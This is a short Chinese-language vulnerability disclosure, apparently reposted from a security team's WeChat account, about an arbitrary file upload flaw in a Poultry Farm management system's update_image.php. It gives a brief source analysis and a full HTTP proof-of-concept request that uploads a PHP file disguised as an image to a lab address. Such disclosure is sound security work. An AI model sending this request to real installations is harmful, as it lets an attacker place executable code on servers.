1. 源码分析
/farm/update_image.php
在源码中可以观察到,后端处理上传文件时,并未对$image=$_FILES["productimage1"]["name"];做任何过滤,从而导致任意文件上传。具体逻辑和product.php中一致)
2. 漏洞复现
POST /RedcockFarm/farm/update_image.php?id=2 HTTP/1.1Host: 192.168.70.139Content-Length: 431Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.70.139Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWY9d7FojmxfSC6yIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.70.139/RedcockFarm/farm/update_image.php?id=2Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8gjigr0om5m6aaqh840mch8ieaConnection: close------WebKitFormBoundaryWY9d7FojmxfSC6yIContent-Disposition: form-data; name="productName"Nikhil Bhalerao------WebKitFormBoundaryWY9d7FojmxfSC6yIContent-Disposition: form-data; name="productimage1"; filename="index.php"Content-Type: image/jpeg<?php ;?>------WebKitFormBoundaryWY9d7FojmxfSC6yIContent-Disposition: form-data; name="submit"------WebKitFormBoundaryWY9d7FojmxfSC6yI--
成功上传后,根据源码可知,文件被传送到了profileimages/文件夹下(这是个坑,因为感觉原作者代码编写问题,文件上传路径并未统一,在项目根目录下并不存在这个文件夹),访问相对路径,查看文件是否能够被成功解析。
原文始发于微信公众号(蟹堡安全团队):Poultry Farm管理系统update_image.php 处存在任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论